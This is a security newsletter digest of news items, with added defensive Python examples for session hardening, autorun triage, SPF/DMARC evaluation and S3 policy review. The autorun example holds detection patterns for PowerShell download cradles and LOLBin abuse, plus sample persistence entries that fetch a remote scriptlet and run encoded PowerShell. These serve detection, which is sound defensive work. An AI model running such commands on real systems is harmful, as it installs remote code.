The US DoJ recently released guidance on running bug bounties. One issue that you might not have thought about is that a bounty program researcher can have the same network traffic profile as an actual hacker, so it is important that security managers ensure they can separate the two. Before you implement any bounty program, think about these unintended security challenges. You may need to up your data protection game before you let researchers loose across your network.
-- David Strom, editor of Inside Security
Testing of various Android-based stock trading apps available for the Hong Kong exchange has revealed that the majority of them contain major security weaknesses, such as the lack of MFA and vulnerability to code injection attacks. Cybersecurity incidents resulting in unauthorized trades added up to more than HK$110 million in the past year, according to officials. The report is available here.
During a session hijacking, a malicious hacker places himself in between your computer and the website’s server while you are engaged in an active session. At this point, the malicious hacker actively monitors everything that happens on your account, and can even kick you out and take control of it. Here is a blow-by-blow account of how this works. -- HEIMDAL SECURITY
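The controls that limit what a hijacked session is worth are server-side, so here is an added example (not code from the Heimdal article) of a minimal session manager: the cookie is marked HttpOnly, Secure and SameSite so the token is harder to steal in the first place; the session ID is rotated when the session gains privilege, so a token captured before login stops working; and the session is bound to a client fingerprint, so a token replayed from a different client is rejected and the session revoked. The fingerprint inputs (address prefix plus User-Agent) and the in-memory store are this example's own assumptions.

```python
import hashlib
import secrets
import time
from typing import Dict, List, Optional

# Added example, not from the article. The /24 prefix + User-Agent fingerprint
# and the in-memory dict store are assumptions made to keep the example short.

SESSION_TTL_SECONDS = 15 * 60


def client_fingerprint(ip_prefix: str, user_agent: str) -> str:
    """Hash of the client attributes the session is bound to (this example's choice)."""
    return hashlib.sha256(f"{ip_prefix}|{user_agent}".encode()).hexdigest()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value: HttpOnly keeps scripts from reading the token, Secure keeps
    it off plaintext HTTP, SameSite stops most cross-site requests from carrying it."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


class SessionStore:
    def __init__(self, ttl: int = SESSION_TTL_SECONDS):
        self._sessions: Dict[str, dict] = {}
        self.ttl = ttl
        self.events: List[tuple] = []  # audit trail a detection pipeline would consume

    def create(self, user: str, fingerprint: str) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the CSPRNG, never a counter
        self._sessions[sid] = {"user": user, "fp": fingerprint, "issued": time.time()}
        return sid

    def rotate(self, old_sid: str) -> str:
        """Issue a fresh ID on login or privilege change so a token captured
        earlier in the session is no longer valid."""
        record = self._sessions.pop(old_sid)
        record["issued"] = time.time()
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = record
        return new_sid

    def validate(self, sid: str, fingerprint: str) -> Optional[str]:
        """Return the user for a live, matching session, else None. A fingerprint
        mismatch revokes the session: the real user re-authenticates and whoever
        replayed the token loses it as well."""
        record = self._sessions.get(sid)
        if record is None:
            return None
        if time.time() - record["issued"] > self.ttl:
            self._sessions.pop(sid)
            self.events.append(("expired", sid, record["user"]))
            return None
        if not secrets.compare_digest(record["fp"], fingerprint):
            self._sessions.pop(sid)
            self.events.append(("fingerprint_mismatch", sid, record["user"]))
            return None
        return record["user"]


def demo() -> dict:
    """Constructed scenario: alice's token is replayed from a different client."""
    store = SessionStore()
    legit_fp = client_fingerprint("203.0.113.0/24", "Mozilla/5.0 (X11; Linux)")
    other_fp = client_fingerprint("198.51.100.0/24", "curl/7.64.0")
    sid = store.create("alice", legit_fp)
    sid = store.rotate(sid)  # e.g. immediately after password/MFA verification
    return {
        "legit_user": store.validate(sid, legit_fp),
        "replayed_user": store.validate(sid, other_fp),   # mismatch: revoked
        "legit_after_revoke": store.validate(sid, legit_fp),
        "events": store.events,
    }


if __name__ == "__main__":
    print(demo())
```

The `events` list is the part worth wiring into monitoring: a burst of `fingerprint_mismatch` records for one user is the server-side signal that someone else is presenting that user's token.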
An attacker could exploit vulnerabilities found in solar panel components to shut down large parts of a power grid. Security researcher Willem Westerhof found that the components (shown here), which convert direct current into alternating current, suffered from 17 vulnerabilities of different severity levels. The researcher has been working with the component maker since last winter to fix these issues. -- GRAHAM CLULEY BLOG
Criminals are going to new lengths to disguise their malware using more advanced, so-called fileless methods. This analysis dissects the operation of one piece of malware called JS_POWMET, and how it leverages registry autostart features and other built-in Windows tools to infect a system. -- TREND MICRO BLOG
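Because fileless malware of this kind persists through an autostart registry value that launches a built-in Windows tool rather than a dropped executable, the autostart values themselves are where a defender looks. The following added example (not Trend Micro's code) runs a few triage heuristics over constructed Run-key entries; the patterns are this example's own assumptions about commonly abused built-in binaries, not a complete or authoritative list.

```python
import re
from typing import List, Tuple

# Added example, not from the Trend Micro analysis. The heuristics below are
# assumptions about autostart values worth a second look: a built-in tool
# invoked with an encoded command, a URL, or inline script rather than a path
# to an installed program.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"powershell(?:\.exe)?[^\n]*\s-(?:e|ec|enc|encodedcommand)\b", re.I),
     "PowerShell with an encoded command"),
    (re.compile(r"powershell(?:\.exe)?[^\n]*\b(?:downloadstring|downloadfile|iex|invoke-expression)\b", re.I),
     "PowerShell download-and-execute cradle"),
    (re.compile(r"regsvr32(?:\.exe)?[^\n]*/i:\s*https?://", re.I),
     "regsvr32 loading a scriptlet from a URL"),
    (re.compile(r"mshta(?:\.exe)?\s+(?:https?://|javascript:|vbscript:)", re.I),
     "mshta executing a URL or inline script"),
    (re.compile(r"rundll32(?:\.exe)?[^\n]*\b(?:javascript|vbscript):", re.I),
     "rundll32 executing inline script"),
    (re.compile(r"\b(?:wscript|cscript)(?:\.exe)?[^\n]*(?:\\temp\\|\\appdata\\)", re.I),
     "script host running a file from a user-writable directory"),
    (re.compile(r"https?://", re.I),
     "autostart value references a URL"),
]

RUN_KEY = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
RUN_KEY_HKLM = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

# Constructed sample export in (key, value name, value data) form; the two
# benign entries are typical of a clean workstation, the other three are
# shaped like the fileless persistence described above. 198.51.100.20 is a
# documentation address, not a real indicator.
SAMPLE_ENTRIES: List[Tuple[str, str, str]] = [
    (RUN_KEY, "OneDrive",
     "\"C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"),
    (RUN_KEY_HKLM, "SecurityHealth", "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
    (RUN_KEY, "Updater", "regsvr32.exe /s /n /u /i:http://198.51.100.20/payload.sct scrobj.dll"),
    (RUN_KEY, "Sync", "powershell.exe -nop -w hidden -enc JABhAD0AMQA="),
    (RUN_KEY, "Helper", "wscript.exe //B C:\\Users\\bob\\AppData\\Roaming\\helper.vbs"),
]


def score_autorun(value: str) -> List[str]:
    """Reasons this autostart value matches a heuristic (empty list if none)."""
    return [reason for pattern, reason in SUSPICIOUS_PATTERNS if pattern.search(value)]


def triage(entries: List[Tuple[str, str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return only the entries that matched, with their reasons, for analyst review."""
    findings = []
    for key, name, value in entries:
        reasons = score_autorun(value)
        if reasons:
            findings.append((key, name, reasons))
    return findings


if __name__ == "__main__":
    for key, name, reasons in triage(SAMPLE_ENTRIES):
        print(f"{key}\\{name}: {'; '.join(reasons)}")
```

On a real host the input would come from an autostart export such as Sysinternals Autoruns output, and the matches are a queue for a human, not a verdict: legitimate software occasionally uses these tools too, which is why each finding carries its reasons.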
Mozilla has launched a free online service for private sharing of an encrypted file of up to 1 GB between two users. It’s called Send, and it’s meant to ensure users’ shared files do not remain online forever. The link expires after a single download or 24 hours, and it works with both Firefox and Chrome browsers. -- FIREFOX
Russians have attacked in cyberspace to further their geopolitical interests, but their hacking activities also form an integral part of a more sophisticated criminal enterprise, bent on extortion and profiteering from private businesses too. Their targets have included Estonia, Georgia, Germany, and the United States (stealing data from the DNC and emails from John Podesta). You’ll need a diversity of approaches, and those approaches will have to evolve over time. The cyber threat has arrived as a clear and present risk to businesses today and addressing it will become a growing cost of doing business. -- HBR
When building red and blue teams, it’s important to ensure that candidates are willing to work in harmony and share ongoing metrics related to their activities. It is not enough to simply conduct routine penetration testing. CISOs should take a series of steps in hiring a red team to go against their blue team defenses. -- SECURITY INTELLIGENCE
How do SPF and DMARC, two long-existing email security standards, stack up and complement each other? Here are the details, along with why it’s only with the addition of DMARC that SPF really functions properly as an anti-fraud tool. -- VALIMAIL BLOG
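The reason SPF alone does not stop fraud is that it checks the envelope sender (the bounce address), which a sender controls, while the recipient sees the header From, which is what DMARC ties it to. The added example below (not Valimail's code) evaluates both over a constructed DNS table: a forged message that passes SPF for the sender's own domain still fails DMARC because the domains are not aligned. The organizational-domain rule is simplified to "last two labels" (real implementations consult the Public Suffix List), and `include:` and DKIM are left out to keep the evaluation short.

```python
import ipaddress
from typing import Dict, Optional

# Added example, not from the Valimail post. Constructed TXT records stand in
# for DNS lookups; attacker.example is a domain the forger controls.
DNS_TXT: Dict[str, str] = {
    "example.com": "v=spf1 ip4:203.0.113.0/24 -all",
    "_dmarc.example.com": "v=DMARC1; p=reject; aspf=r",
    "attacker.example": "v=spf1 ip4:198.51.100.0/24 -all",
}


def spf_check(envelope_domain: str, sender_ip: str) -> str:
    """Evaluate ip4 mechanisms and 'all' only (no include/a/mx in this example)."""
    record = DNS_TXT.get(envelope_domain.lower())
    if not record or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:") and ip in ipaddress.ip_network(term[4:], strict=False):
            return "pass" if qualifier == "+" else "fail"
        if term == "all":
            return {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}[qualifier]
    return "neutral"


def org_domain(domain: str) -> str:
    # Assumption: organizational domain = last two labels; real code uses the PSL.
    return ".".join(domain.lower().split(".")[-2:])


def aligned(spf_domain: str, from_domain: str, mode: str) -> bool:
    """DMARC identifier alignment: strict ('s') needs an exact match,
    relaxed ('r') accepts the same organizational domain."""
    if mode == "s":
        return spf_domain.lower() == from_domain.lower()
    return org_domain(spf_domain) == org_domain(from_domain)


def parse_dmarc(from_domain: str) -> Optional[Dict[str, str]]:
    record = DNS_TXT.get(f"_dmarc.{from_domain.lower()}")
    if not record or not record.startswith("v=DMARC1"):
        return None
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    return {"p": tags.get("p", "none"), "aspf": tags.get("aspf", "r")}


def evaluate(header_from_domain: str, envelope_from_domain: str, sender_ip: str) -> Dict[str, str]:
    """SPF result, DMARC result, and what the receiver should do with the message."""
    spf = spf_check(envelope_from_domain, sender_ip)
    policy = parse_dmarc(header_from_domain)
    if policy is None:
        return {"spf": spf, "dmarc": "none", "disposition": "deliver"}
    passed = spf == "pass" and aligned(envelope_from_domain, header_from_domain, policy["aspf"])
    disposition = "deliver" if passed else {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}[policy["p"]]
    return {"spf": spf, "dmarc": "pass" if passed else "fail", "disposition": disposition}


if __name__ == "__main__":
    # Constructed cases: a real mailing, and a forgery that passes SPF for its own domain.
    print("legit  ", evaluate("example.com", "example.com", "203.0.113.5"))
    print("forged ", evaluate("example.com", "attacker.example", "198.51.100.7"))
```

The second case is the one the post is about: SPF reports `pass`, because the forger published a valid SPF record for the domain in the envelope, yet DMARC fails on alignment and example.com's `p=reject` policy tells the receiver to drop the message.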
Amazon warned users with publicly accessible S3 buckets and suggested a review of the AWS S3 bucket policies, as well as the contents of the bucket, in order to avoid the exposure of sensitive data, according to a copy of the email shared by a penetration tester for HackerOne. Amazon wrote in the email: "We encourage you to promptly review your S3 buckets and their contents to ensure that you are not inadvertently making objects available to users that you don't intend." -- SEARCH SECURITY
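The review Amazon asks for starts with the bucket policy, and the statement shape that makes objects world-readable is specific: an `Allow` whose `Principal` is anyone (`"*"` or `{"AWS": "*"}`) for an object- or listing-level action. Here is an added example (not Amazon's or HackerOne's code) that flags such statements in a policy document, shown on a constructed weak policy beside a corrected one; the account ID and role name are placeholders.

```python
import json
from typing import Any, Dict, List

# Added example, not from the article. 123456789012 and role/app-reader are
# placeholders, not a real account or role.
PUBLIC_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:putobject", "s3:*", "*"}


def _as_list(value: Any) -> list:
    """IAM policy fields may be a single string or a list; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def principal_is_anyone(principal: Any) -> bool:
    """True for the anonymous principal in either of its spellings."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def public_findings(policy: Dict[str, Any]) -> List[str]:
    """One finding per Allow statement that grants a public-exposing action to anyone."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow" or not principal_is_anyone(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        hits = sorted(actions & PUBLIC_ACTIONS)
        if not hits:
            continue
        # A Condition may narrow who "anyone" really is (e.g. a VPC endpoint), so it
        # downgrades the finding to "review" rather than silencing it.
        note = " (narrowed by a Condition; review it)" if "Condition" in stmt else ""
        findings.append(f"statement {i} ({stmt.get('Sid', 'no Sid')}): anonymous principal "
                        f"allowed {', '.join(hits)}{note}")
    return findings


# Constructed: the pattern behind most accidental exposures.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-bucket/*",
    }],
}

# Constructed: same access, granted only to one identity in the owning account.
FIXED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppRead",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"],
    }],
}


def check_policy_json(document: str) -> List[str]:
    """Entry point for a policy fetched as JSON text."""
    return public_findings(json.loads(document))


if __name__ == "__main__":
    print("weak :", public_findings(WEAK_POLICY))
    print("fixed:", public_findings(FIXED_POLICY))
```

To run it over real buckets, feed `check_policy_json` the `Policy` string returned by `aws s3api get-bucket-policy --bucket NAME`. A bucket policy is only one of the ways objects become public (ACLs on the bucket or on individual objects are the other), so an empty result here does not finish the review Amazon describes.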
Qualys, Inc., a provider of cloud-based security and compliance solutions, last week announced that it has entered into an asset purchase agreement with Nevis Networks to acquire their passive scanning technologies. Terms of the deal were not disclosed, said Philippe Courtot, chairman and Qualys CEO. -- QUALYS
Just for fun
Chrome is making some progress. -- MATT HOLT @ TWITTER